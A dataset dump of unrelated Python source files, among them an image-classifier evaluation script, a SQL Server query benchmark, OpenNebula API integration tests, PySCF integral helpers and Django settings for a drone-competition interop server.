255.0 # HWC to CHW\n\n tensor_batch = tensor_img.cuda()\n\n probs, labels, labels_probs = infer_batch(model, classes_list, tensor_batch, threshold)\n print(probs)\n print(labels)\n print(labels_probs)\n\n\ndef test_with_loader():\n\n # model, input_size, threshold, num_classes, classes_list = load_model(\"XL\")\n model, input_size, threshold, num_classes, classes_list = load_model(\"L\")\n\n\n from torchvision.transforms import transforms\n from data_loader import CocoObject\n from torch.autograd import Variable\n from sklearn.metrics import average_precision_score\n import torch.nn as nn\n from tqdm import tqdm as tqdm\n # crop_size = 224\n # image_size = 256\n # batch_size = 4\n batch_size = 12\n # normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n # std=[0.229, 0.224, 0.225])\n\n val_transform = transforms.Compose([\n transforms.Resize([input_size, input_size]),\n # transforms.CenterCrop(crop_size),\n transforms.ToTensor(),\n ])\n\n # Data samplers.\n ann_dir = '/home/ytianas/EMSE_COCO/cocodataset/annotations'\n image_dir = '/home/ytianas/EMSE_COCO/cocodataset/'\n test_data = CocoObject(ann_dir=ann_dir, image_dir=image_dir,\n split='test', transform=val_transform)\n image_ids = test_data.image_ids\n image_path_map = test_data.image_path_map\n # 80 objects\n id2object = test_data.id2object\n id2labels = test_data.id2labels\n # Data loaders / batch assemblers.\n test_loader = torch.utils.data.DataLoader(test_data, batch_size=batch_size,\n shuffle=False, num_workers=4,\n pin_memory=True)\n count = 0\n yhats = []\n labels = []\n imagefiles = []\n res = list()\n\n t = tqdm(test_loader, desc = 'testing')\n\n for batch_idx, (images, objects, image_ids) in enumerate(t):\n\n images = Variable(images).cuda()\n objects = Variable(objects).cuda()\n\n # print(images.shape)\n\n object_preds = model(images)\n m = nn.Sigmoid()\n object_preds_r = m(object_preds)\n\n count = count + len(image_ids)\n for i in range(len(image_ids)):\n image_file_name = image_path_map[int(image_ids[i])]\n yhat = []\n label = id2labels[int(image_ids[i])]\n\n for j in range(len(object_preds[i])):\n a = object_preds_r[i][j].cpu().data.numpy()\n if a > threshold:\n yhat.append(id2object[j])\n\n yhats.append(yhat)\n labels.append(label)\n imagefiles.append(image_file_name)\n\n\n res.append((image_ids, object_preds.data.cpu(), objects.data.cpu()))\n if count % 1000 == 0:\n print(\"count: \" + str(count))\n\n preds_object = torch.cat([entry[1] for entry in res], 0)\n targets_object = torch.cat([entry[2] for entry in res], 0)\n eval_score_object = average_precision_score(targets_object.numpy(), preds_object.numpy())\n print('\\nmean average precision of object classifier on test data is {}\\n'.format(eval_score_object))\n\n\nif __name__ == '__main__':\n\n # test_single()\n test_with_loader()","sub_path":"infer_batch.py","file_name":"infer_batch.py","file_ext":"py","file_size_in_byte":5586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"130956537","text":"import os\nimport csv\nimport pyodbc\nimport time\nimport random\n\ncurrent_milli_time = lambda: int(round(time.time() * 1000))\n\ndef reset(cursor):\n\twith open('proxi_mk01.ddl','r') as f:\n\t\tsqlScript = f.read()\n\t\tstatements = sqlScript.split(';')\n\t\tstart_time = current_milli_time()\n\t\tfor statement in statements:\n\t\t\tstatement += ';'\n\t\t\tcursor.execute(statement)\n\t\t\tcursor.commit()\n\ndef runSQL(size):\n\tprint('Running SQL')\n\tresults = {'ID': 'SQL', 'SIZE': size}\n\n\t# SQL SERVER\n\tsqlexpress02 = 'Server=localhost\\\\SQLEXPRESS02;Database=master;Trusted_Connection=True;'\n\t# print(\"Establishing Connection...\")\n\n\tstart_time = current_milli_time()\n\tsql_conn = pyodbc.connect('Driver={SQL Server};'\n\t 'Server=localhost\\\\SQLEXPRESS02;'\n\t 'Database=master;'\n\t 'Trusted_Connection=yes;')\n\tend_time = current_milli_time()\n\n\trun_time = end_time - start_time\n\t# print(\"Connected in {} ms\".format(run_time))\n\tresults['EC'] = run_time\n\tcursor = sql_conn.cursor()\n\n\terr_line = ''\n\ttry:\n\t\t# Define Model\n\t\t# print(\"Defining Model...\")\n\t\tinputdir = 'proxi_mk01.ddl'\n\n\t\t# with open(inputdir,'r') as f:\n\t\t# \tsqlScript = f.read()\n\t\t# \tstatements = sqlScript.split(';')\n\t\t# start_time = current_milli_time()\n\t\t# reset(cursor)\n\t\t# # \tfor statement in statements:\n\t\t# # \t\tstatement += ';'\n\t\t# # \t\tcursor.execute(statement)\n\t\t# end_time = current_milli_time()\n\t\t# run_time = end_time - start_time\n\t\t# # print(\"Model Defined in {} ms\".format(run_time))\n\t\t# results['DD'] = [run_time]\n\n\t\t# # num_runs = [1, 5, 10, 100, 250, 500]\n\t\t# # for run in num_runs:\n\t\t# # \tprint(\"Loading {} of data...\".format(run))\n\t\t# # \twith open('sql_data.sql', 'r') as f:\n\t\t# # \t\tstart_time = current_milli_time()\n\t\t# # \t\tfor i in range(0, run):\n\t\t# # \t\t\tline = next(f)\n\t\t# # \t\t\terr_line = line\n\t\t# # \t\t\tcursor.execute(line)\n\t\t# # \t\t\tcursor.commit()\n\t\t# # \t\tend_time = current_milli_time()\n\t\t# # \t\trun_time = end_time - start_time\n\t\t# # \t\tprint(\"Data loaded in {} ms\".format(run_time))\n\t\t# # \t\tresults['DL{}'.format(run)] = run_time\n\n\t\t# # Resetting\n\t\t# # print(\"Resetting...\")\n\t\t# with open(inputdir,'r') as f:\n\t\t# \tsqlScript = f.read()\n\t\t# \tstatements = sqlScript.split(';')\n\t\t# \tstart_time = current_milli_time()\n\t\t# \tfor statement in statements:\n\t\t# \t\tstatement += ';'\n\t\t# \t\tcursor.execute(statement)\n\t\t# \tend_time = current_milli_time()\n\t\t# \trun_time = end_time - start_time\n\t\t# # print(\"Model Defined in {} ms\".format(run_time))\n\t\t# results['DD'].append(run_time)\n\n\n\t\t# # Load All Data\n\t\t# # print(\"Loading All Data...\")\n\t\t# with open('sql_data.sql', 'r') as f:\n\t\t# \tstart_time = current_milli_time()\n\t\t# \tfor line in f:\n\t\t# \t\terr_line = line\n\t\t# \t\ttry:\n\t\t# \t\t\tcursor.execute(line)\n\t\t# \t\t\tcursor.commit()\n\t\t# \t\texcept:\n\t\t# \t\t\tprint(\"FAILED: \" + err_line)\n\t\t# \tend_time = current_milli_time()\n\t\t# \trun_time = end_time - start_time\n\t\t# \t# print(\"Data loaded in {} ms\".format(run_time))\n\t\t# \tresults['DL*'] = run_time\n\n\t\t# Run Queries\n\t\tqueries = []\n\t\tqueries.append(\"SELECT * FROM Users WHERE user_id = {};\")\n\t\t# queries.append(\"SELECT * FROM Users WHERE user_name = 'craigjohn';\")\n\t\tqueries.append(\"SELECT Y.name FROM Users AS X, Users as Y, User_to_Interest as UI WHERE X.user_id = {} AND X.user_id = UI.user_id AND Y.user_id IN (SELECT SUI.user_id FROM User_to_Interest as SUI WHERE SUI.interest_id = UI.interest_id AND NOT SUI.user_id = X.user_id);\")\n\t\tqueries.append(\"SELECT U.user_name FROM Users as U, isFriendsWith as IFW WHERE IFW.user_id = {} AND IFW.friend_id = U.user_id\")\n\t\tqueries.append(\"SELECT DISTINCT G.group_name FROM Users as U, Groups as G, isFriendsWith as IFW, isMember as IM WHERE U.user_id = {} AND G.group_id = IM.group_id AND U.user_id = IFW.user_id AND IFW.friend_id = IM.user_id;\")\n\t\tqueries.append(\"SELECT U.user_name FROM Users as U, Events as E, isMember as IM, isAttending as IA WHERE IM.user_id = {} AND E.group_id = IM.group_id AND IA.event_id = E.event_id AND IA.user_id = U.user_id;\")\n\t\tqueries.append(\"SELECT I.interest_name FROM User_to_Interest as UI, Group_to_Interest as GI, Events as E, isAttending as IA, User_to_Interest as UI2, Interests as I WHERE UI.user_id = {} AND UI.interest_id = GI.interest_id AND E.group_id = GI.group_id AND IA.event_id = E.event_id AND IA.user_id = UI2.user_id AND UI2.interest_id = I.interest_id;\")\n\n\n\t\tquery_tags = []\n\t\tnum_runs = 1\n\t\tnum_repeats = 100\n\t\tfor j in range(0, num_runs):\n\t\t\tfor i in range(0, len(queries)):\n\t\t\t\t# print(\"Running Query \", i)\n\t\t\t\tstart_time = current_milli_time()\n\t\t\t\tfor x in range(0, num_repeats):\n\t\t\t\t\tuser_id = random.randint(1, 1000)\n\t\t\t\t\trst = cursor.execute(queries[i].format(user_id))\n\t\t\t\t\tcount = 0\n\t\t\t\t\tfor ele in rst:\n\t\t\t\t\t\tcount += 1\n\t\t\t\tend_time = current_milli_time()\n\t\t\t\trun_time = end_time - start_time\n\t\t\t\t# print(\"Query {} ran in {} ms\".format(i, run_time))\n\t\t\t\ttag = 'Q{} - {}'.format(i, num_repeats)\n\t\t\t\tresults[tag] = run_time\n\t\t\t\tquery_tags.append(tag)\n\n\t\tfor tag in query_tags:\n\t\t\tresults[tag] = results[tag] / num_runs\n\n\t\twith open(\"sql-results.csv\", \"a\", newline='') as f:\n\t\t\twriter = csv.writer(f)\n\t\t\tfor key, value in results.items():\n\t\t\t\twriter.writerow([key, value])\n\t\t\tf.write('||')\n\texcept Exception as e:\n\t\tprint(err_line)\n\t\tprint(e)\n\tfinally:\n\t\tprint(results)\n\t\tsql_conn.close()\n\n# cursor.execute('SELECT * FROM Users')\n# for row in cursor:\n# print(row)\n\n# print(\"Dropping Tables...\")\n# with open('sql_drop_tables.sql', 'r') as f:\n# \tstart_time = current_milli_time()\n# \tfor line in f:\n# \t\terr_line = line\n# \t\tcursor.execute(line)\n# \t\tcursor.commit()\n# \tend_time = current_milli_time()\n# \trun_time = end_time - start_time\n# \tprint(\"Tables Dropped in {} ms\".format(run_time))\n# \tresults['DT'] = run_time\n\nrunSQL(100000)","sub_path":"Files/main_sql.py","file_name":"main_sql.py","file_ext":"py","file_size_in_byte":5669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"119905142","text":"import cv2 \nimport numpy\n\n#cap = cv2.VideoCapture(\"I:\\_Project\\RandImage\\VID_20180325_204303.mp4\")\ncap = cv2.VideoCapture(\"I:\\_Project\\RandImage\\VID_20180325_215149.mp4\")\n\niCount = 0\nwhile(1):\n \n # get a frame\n ret, frame = cap.read()\n iCount = iCount + 1\n \n print( iCount )\n if iCount < 30*30 : \n continue;\n \n # show a frame\n if 1 :\n cv2.imshow(\"capture\", frame)\n if cv2.waitKey(1111) & 0xFF == ord('q'):\n break\n else:\n cv2.imwrite( \"I:\\_Project\\RandImage\\DebugImg\\%08d.png\"%(iCount) , frame) \n","sub_path":"test_ReadMp4.py","file_name":"test_ReadMp4.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"65666005","text":"# coding: utf-8\n\n# Copyright 2018 www.privaz.io Valletech AB\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport unittest\nimport ssl\nimport os\nfrom pyone import HOST_STATES, HOST_STATUS, OneException, OneAuthenticationException\n\nos.environ[\"PYONE_TEST_FIXTURE\"]=\"yes\"\nos.environ[\"PYONE_TEST_FIXTURE_FILE\"]=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'fixtures', 'integration.json.gz')\nos.environ[\"PYONE_TEST_FIXTURE_REPLAY\"]=\"yes\"\n\n# Note that we import a TesterServer that has extends with record/replay fixtures\nfrom pyone.server import OneServer\n\n# Deprecated utility, testing backward compatibility\nfrom pyone.util import one2dict\n\n# Capture OpenNebula Session parameters from environment or hardcoded...\ntest_session = os.getenv(\"PYONE_SESSION\", \"oneadmin:onepass\")\ntest_endpoint = os.getenv(\"PYONE_ENDPOINT\", 'https://192.168.121.78/RPC2')\n\n# Disable SSL checks for TEST environment only, and deal with Centos, see issue #13\nif \"PYTHONHTTPSVERIFY\" in os.environ:\n one = OneServer(test_endpoint, session=test_session)\nelse:\n one = OneServer(test_endpoint, session=test_session, context=ssl._create_unverified_context())\n\n# Test Objects\ntestHostAId = None\ntestHostBId = None\ntestVMAid = None\n\nclass IntegrationTests(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n \"\"\"\n Will define test resources from the pool\n anyone should do\n :return:\n \"\"\"\n\n global testHostAId, testHostBId, testVMAid\n\n one.set_fixture_unit_test(\"setup\")\n hosts = one.hostpool.info()\n testHostAId = hosts.HOST[0].ID\n testHostBId = hosts.HOST[1].ID\n vms = one.vmpool.info(-2, -1, -1, -1)\n testVMAid = vms.VM[0].ID\n\n def test_pool_info(self):\n one.set_fixture_unit_test(\"test_pool_info\")\n hostpool = one.hostpool.info()\n self.assertGreater(len(hostpool.HOST), 0)\n host = hostpool.HOST[0]\n self.assertIn(HOST_STATES(host.STATE), [HOST_STATES.MONITORED, HOST_STATES.INIT])\n\n def test_market_info(self):\n one.set_fixture_unit_test(\"test_market_info\")\n marketpool = one.marketpool.info()\n self.assertGreater(len(marketpool.MARKETPLACE), 0)\n m0 = marketpool.MARKETPLACE[0]\n self.assertEqual(m0.NAME, \"OpenNebula Public\")\n\n def test_vm_pool(self):\n one.set_fixture_unit_test(\"test_vm_pool\")\n vmpool = one.vmpool.info(-2, -1, -1, -1)\n vm0 = vmpool.VM[0]\n self.assertEqual(vm0.UNAME, \"oneadmin\")\n\n def test_invalid_method(self):\n with self.assertRaises(OneException):\n one.set_fixture_unit_test(\"test_invalid_method\")\n one.invalid.api.call()\n\n def test_template_attribute_vector_parameter(self):\n one.set_fixture_unit_test(\"test_template_attribute_vector_parameter\")\n one.host.update(testHostAId, {\"LABELS\": \"HD,LOWPOWER\"}, 1)\n host = one.host.info(testHostAId)\n self.assertEqual(host.TEMPLATE['LABELS'], u\"HD,LOWPOWER\")\n\n def test_xml_template_parameter(self):\n one.set_fixture_unit_test(\"test_xml_template_parameter\")\n one.host.update(testHostBId,\n {\n 'TEMPLATE': {\n 'LABELS': 'SSD',\n 'MAX_CPU': '176'\n }\n }, 1)\n host = one.host.info(testHostBId)\n self.assertEqual(host.TEMPLATE['LABELS'], u\"SSD\")\n self.assertEqual(host.TEMPLATE['MAX_CPU'], u\"176\")\n\n def test_empty_dictionary(self):\n with self.assertRaises(Exception):\n one.set_fixture_unit_test(\"test_empty_dictionary\")\n one.host.update(testHostAId, {}, 1)\n\n def test_retrieve_template_as_DOM_no_longer_working(self):\n with self.assertRaises(AttributeError):\n one.set_fixture_unit_test(\"test_retrieve_template_as_DOM_no_longer_working\")\n host = one.host.info(testHostAId)\n template = host.TEMPLATE.toDOM()\n arch = template.getElementsByTagName('ARCH')[0].firstChild.nodeValue\n self.assertEqual(arch, 'x86_64')\n\n def test_retrieve_template_as_deprecated_dict(self):\n one.set_fixture_unit_test(\"test_retrieve_template_as_deprecated_dict\")\n host = one.host.info(testHostAId)\n tdict = one2dict(host.TEMPLATE)\n arch = tdict['TEMPLATE']['ARCH']\n self.assertEqual(arch, 'x86_64')\n\n def test_retrieve_template_as_new_dict(self):\n one.set_fixture_unit_test(\"test_retrieve_template_as_new_dict\")\n host = one.host.info(testHostAId)\n arch = host.TEMPLATE['ARCH']\n self.assertEqual(arch, 'x86_64')\n\n def test_international_characters_issue_006(self):\n one.set_fixture_unit_test(\"test_international_characters_issue_006\")\n one.host.update(testHostAId,\n {\n 'TEMPLATE': {\n 'NOTES': 'Hostname is: ESPAÑA',\n }\n }, 1)\n host = one.host.info(testHostAId)\n self.assertIn(host.TEMPLATE['NOTES'], [u\"Hostname is: ESPAÑA\"])\n\n def test_modify_template(self):\n one.set_fixture_unit_test(\"test_modify_template\")\n host = one.host.info(testHostAId)\n host.TEMPLATE[\"NOTES\"]=u\"Hostname is: España\"\n one.host.update(testHostAId, host.TEMPLATE, 1)\n host2 = one.host.info(testHostAId)\n self.assertIn(host2.TEMPLATE['NOTES'], [u\"Hostname is: España\"])\n\n\n def test_vm_info(self):\n one.set_fixture_unit_test(\"test_vm_info\")\n vm = one.vm.info(testVMAid)\n labels = vm.USER_TEMPLATE.get('LABELS', \"\")\n culsterId = vm.TEMPLATE['DISK']['CLUSTER_ID']\n self.assertEqual(vm.ID,testVMAid)\n\n def test_market_info(self):\n one.set_fixture_unit_test(\"test_market_info\")\n markets = one.marketpool.info()\n self.assertEqual(markets.MARKETPLACE[0].NAME, \"OpenNebula Public\")\n\n def test_maketplace_app_info(self):\n one.set_fixture_unit_test(\"test_maketplace_app_info\")\n maketplace_apps= one.marketapppool.info(-2, -1, -1)\n self.assertEqual(maketplace_apps.MARKETPLACEAPP[0].GNAME, 'oneadmin')\n\n def test_app_export(self):\n one.set_fixture_unit_test(\"test_app_export\")\n one.marketapp.export(6)\n\n def test_datastore_info(self):\n one.set_fixture_unit_test(\"test_datastore_info\")\n datastores = one.datastorepool.info()\n self.assertEqual(datastores.DATASTORE[0].GNAME,\"oneadmin\")\n\n\n def test_marshalling_enums(self):\n one.set_fixture_unit_test(\"test_marshalling_enums\")\n self.assertTrue(one.host.status(testHostAId, HOST_STATUS.ENABLED))\n\n @classmethod\n def tearDownClass(cls):\n one.server_close()\n\n\nclass AuthenticationTest(unittest.TestCase):\n def test_auth_error(self):\n with self.assertRaises(OneAuthenticationException):\n afixture_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'fixtures', 'auth.json.gz')\n # Disable SSL checks for TEST environment only, and deal with Centos, see issue #13\n if \"PYTHONHTTPSVERIFY\" in os.environ:\n xone = OneServer(test_endpoint, fixture_file=afixture_file, session=\"oneadmin:invalidpass\")\n else:\n xone = OneServer(test_endpoint, fixture_file=afixture_file, session=\"oneadmin:invalidpass\", context=ssl._create_unverified_context())\n\n xone.set_fixture_unit_test(\"test_auth_error\")\n try:\n xone.hostpool.info()\n finally:\n xone.server_close()\n","sub_path":"tests/integration/test_integration.py","file_name":"test_integration.py","file_ext":"py","file_size_in_byte":7989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"272546062","text":"from datetime import datetime, timedelta\n\n\nclass FlightSearch:\n def __init__(self, source, destination, from_date, to_date):\n self.departureStation: str = source\n self.arrivalStation: str = destination\n self.from_date: str = from_date\n self.to_date: str = to_date\n\n def to_dictionary(self):\n if isinstance(self.from_date, datetime):\n self.from_date = self.from_date.strftime('%Y-%m-%d')\n self.to_date = self.to_date.strftime('%Y-%m-%d')\n return {\n \"departureStation\": self.departureStation,\n \"arrivalStation\": self.arrivalStation,\n \"from\": self.from_date,\n \"to\": self.to_date\n }\n","sub_path":"models/flightSearch.py","file_name":"flightSearch.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"291532254","text":"#!/usr/bin/env python\n#\n# Author: Qiming Sun \n#\n\nimport ctypes\nimport _ctypes\nimport numpy\nimport pyscf.lib\nfrom pyscf import gto\nfrom pyscf.scf import _vhf\n\nlibri = pyscf.lib.load_library('libri')\ndef _fpointer(name):\n return ctypes.c_void_p(_ctypes.dlsym(libri._handle, name))\n\ndef nr_auxe2(intor, basrange, atm, bas, env,\n aosym='s1', comp=1, cintopt=None, out=None, ijkoff=0,\n naoi=None, naoj=None, naoaux=None,\n iloc=None, jloc=None, kloc=None):\n assert(aosym[:2] in ('s1', 's2'))\n atm = numpy.asarray(atm, dtype=numpy.int32, order='C')\n bas = numpy.asarray(bas, dtype=numpy.int32, order='C')\n env = numpy.asarray(env, dtype=numpy.double, order='C')\n natm = ctypes.c_int(len(atm))\n nbas = ctypes.c_int(len(bas))\n i0, ic, j0, jc, k0, kc = basrange\n if 'ssc' in intor:\n if iloc is None: iloc = make_loc(i0, ic, _cgto_spheric(bas))\n if jloc is None: jloc = make_loc(j0, jc, _cgto_spheric(bas))\n if kloc is None: kloc = make_loc(k0, kc, _cgto_cart(bas))\n elif 'cart' in intor:\n if iloc is None: iloc = make_loc(i0, ic, _cgto_cart(bas))\n if jloc is None: jloc = make_loc(j0, jc, _cgto_cart(bas))\n if kloc is None: kloc = make_loc(k0, kc, _cgto_cart(bas))\n else:\n if iloc is None: iloc = make_loc(i0, ic, _cgto_spheric(bas))\n if jloc is None: jloc = make_loc(j0, jc, _cgto_spheric(bas))\n if kloc is None: kloc = make_loc(k0, kc, _cgto_spheric(bas))\n if naoi is None:\n naoi = iloc[-1] - iloc[0]\n if naoj is None:\n naoj = jloc[-1] - jloc[0]\n if naoaux is None:\n naoaux = kloc[-1] - kloc[0]\n\n if aosym in ('s1'):\n fill = _fpointer('RIfill_s1_auxe2')\n ij_count = naoi * naoj\n else:\n fill = _fpointer('RIfill_s2ij_auxe2')\n ij_count = iloc[-1]*(iloc[-1]+1)//2 - iloc[0]*(iloc[0]+1)//2\n if comp == 1:\n shape = (ij_count,naoaux)\n else:\n shape = (comp,ij_count,naoaux)\n if out is None:\n out = numpy.empty(shape)\n else:\n out = numpy.ndarray(shape, buffer=out)\n\n basrange = numpy.asarray(basrange, numpy.int32)\n fintor = _fpointer(intor)\n if cintopt is None:\n intopt = _vhf.make_cintopt(atm, bas, env, intor)\n else:\n intopt = cintopt\n libri.RInr_3c2e_auxe2_drv(fintor, fill,\n out.ctypes.data_as(ctypes.c_void_p),\n ctypes.c_size_t(ijkoff),\n ctypes.c_int(naoj), ctypes.c_int(naoaux),\n basrange.ctypes.data_as(ctypes.c_void_p),\n iloc.ctypes.data_as(ctypes.c_void_p),\n jloc.ctypes.data_as(ctypes.c_void_p),\n kloc.ctypes.data_as(ctypes.c_void_p),\n ctypes.c_int(comp), intopt,\n atm.ctypes.data_as(ctypes.c_void_p), natm,\n bas.ctypes.data_as(ctypes.c_void_p), nbas,\n env.ctypes.data_as(ctypes.c_void_p))\n if cintopt is None:\n libri.CINTdel_optimizer(ctypes.byref(intopt))\n return out\n\ndef totcart(bas):\n return ((bas[:,gto.ANG_OF]+1) * (bas[:,gto.ANG_OF]+2)//2 *\n bas[:,gto.NCTR_OF]).sum()\ndef totspheric(bas):\n return ((bas[:,gto.ANG_OF]*2+1) * bas[:,gto.NCTR_OF]).sum()\ndef make_loc(shl0, shlc, num_cgto):\n loc = numpy.empty(shlc+1, dtype=numpy.int32)\n off = 0\n for k, i in enumerate(range(shl0, shl0+shlc)):\n loc[k] = off\n off += num_cgto(i)\n loc[shlc] = off\n return loc\ndef _cgto_spheric(bas):\n return lambda i: (bas[i,gto.ANG_OF]*2+1) * bas[i,gto.NCTR_OF]\ndef _cgto_cart(bas):\n def fcart(i):\n l = bas[i,gto.ANG_OF]\n return (l+1)*(l+2)//2 * bas[i,gto.NCTR_OF]\n return fcart\n","sub_path":"df/_ri.py","file_name":"_ri.py","file_ext":"py","file_size_in_byte":3847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"594513122","text":"\"\"\"\nDjango settings for the interop server.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.11/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.11/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'anp#d4lgo3u6j&6dc3+8sn!t+l(6hcuspm^&3(yq10evfwbh+1'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = False\n\nALLOWED_HOSTS = ['*']\n\n# Public IP addresses given access to Django Debug Toolbar\n# Add your IP here, if not localhost.\nINTERNAL_IPS = ['127.0.0.1']\n\n# Application definition\nINSTALLED_APPS = (\n 'auvsi_suas',\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.messages',\n 'django.contrib.sessions',\n 'django.contrib.staticfiles',\n 'pipeline',\n) # yapf: disable\n\nMIDDLEWARE = (\n 'django.middleware.security.SecurityMiddleware',\n 'django.middleware.gzip.GZipMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.http.ConditionalGetMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'pipeline.middleware.MinifyHTMLMiddleware',\n 'auvsi_suas.views.middleware.LoggingMiddleware',\n) # yapf: disable\n\nROOT_URLCONF = 'server.urls'\nWSGI_APPLICATION = 'server.wsgi.application'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\n# Database\n# https://docs.djangoproject.com/en/1.11/ref/settings/#databases\n# SECURITY WARNING: change the database superuser password!\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'auvsi_suas_db',\n 'USER': 'postgres',\n 'PASSWORD': 'postgres',\n 'CONN_MAX_AGE': None,\n 'HOST': 'interop-db',\n 'PORT': '5432',\n 'TEST': {\n 'NAME': 'test_auvsi_suas_db',\n },\n }\n}\n\n# Caches\n# https://docs.djangoproject.com/en/1.11/topics/cache\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',\n 'TIMEOUT': 10,\n 'KEY_PREFIX': 'suas',\n }\n}\n\n# Logging\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'verbose': {\n 'format':\n '%(asctime)s %(levelname)s %(module)s %(process)d %(thread)d %(message)s'\n },\n 'simple': {\n 'format': '%(asctime)s %(levelname)s %(module)s %(message)s'\n },\n },\n 'handlers': {\n 'file': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'simple',\n },\n },\n 'loggers': {\n 'py.warnings': {\n 'handlers': ['file'],\n },\n 'django': {\n 'handlers': ['file'],\n },\n 'django.request': {\n 'handlers': ['file'],\n 'level': 'WARNING',\n 'propagate': True,\n },\n 'django.security': {\n 'handlers': ['file'],\n 'level': 'WARNING',\n 'propagate': True,\n },\n 'auvsi_suas.views': {\n 'handlers': ['file'],\n 'level': 'WARNING',\n 'propagate': True,\n },\n },\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.11/topics/i18n/\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'America/New_York'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.11/howto/static-files/\nSTATIC_URL = '/static/'\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static')\n\nSTATICFILES_DIRS = [\n os.path.join(BASE_DIR, 'auvsi_suas/frontend'),\n]\n\nSTATICFILES_STORAGE = 'pipeline.storage.PipelineStorage'\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'pipeline.finders.PipelineFinder',\n)\n\nPIPELINE = {\n 'STYLESHEETS': {\n 'styles': {\n 'source_filenames': (\n 'third_party/bootstrap/bootstrap.min.css',\n 'app.css',\n 'components/team-status.css',\n 'pages/mission-dashboard.css',\n 'pages/mission-list.css',\n 'pages/odlc-review.css',\n 'pages/evaluate-teams.css',\n ),\n 'output_filename': 'styles.css',\n },\n },\n 'JAVASCRIPT': {\n 'scripts': {\n 'source_filenames': (\n 'third_party/jquery/jquery.min.js',\n 'third_party/bootstrap/bootstrap.min.js',\n 'third_party/angularjs/angular.min.js',\n 'third_party/angularjs/angular-resource.min.js',\n 'third_party/angularjs/angular-route.min.js',\n 'app.js',\n 'components/navigation.js',\n 'components/backend-service.js',\n 'components/team-status-controller.js',\n 'pages/gps-conversion-controller.js',\n 'pages/mission-dashboard-controller.js',\n 'pages/mission-list-controller.js',\n 'pages/odlc-review-controller.js',\n 'pages/evaluate-teams-controller.js',\n ),\n 'output_filename': 'scripts.js',\n },\n },\n} # yapf: disable\n\n# User uploaded files\nMEDIA_URL = '/media/'\nMEDIA_ROOT = '/var/www/media'\n\n# Send images with sendfile.\nSENDFILE_BACKEND = 'sendfile.backends.nginx'\nSENDFILE_ROOT = MEDIA_ROOT\nSENDFILE_URL = MEDIA_URL\n\n# Login URL\nLOGIN_URL = '/admin/login/?next=/'\n\n# Migrations\nMIGRATION_MODULES = {\n 'auvsi_suas.models': 'auvsi_suas.models.migrations',\n} # yapf: disable\n\n# Custom test runner.\nTEST_RUNNER = 'auvsi_suas.test_runner.AuvsiSuasTestRunner'\n","sub_path":"server/server/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":6606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
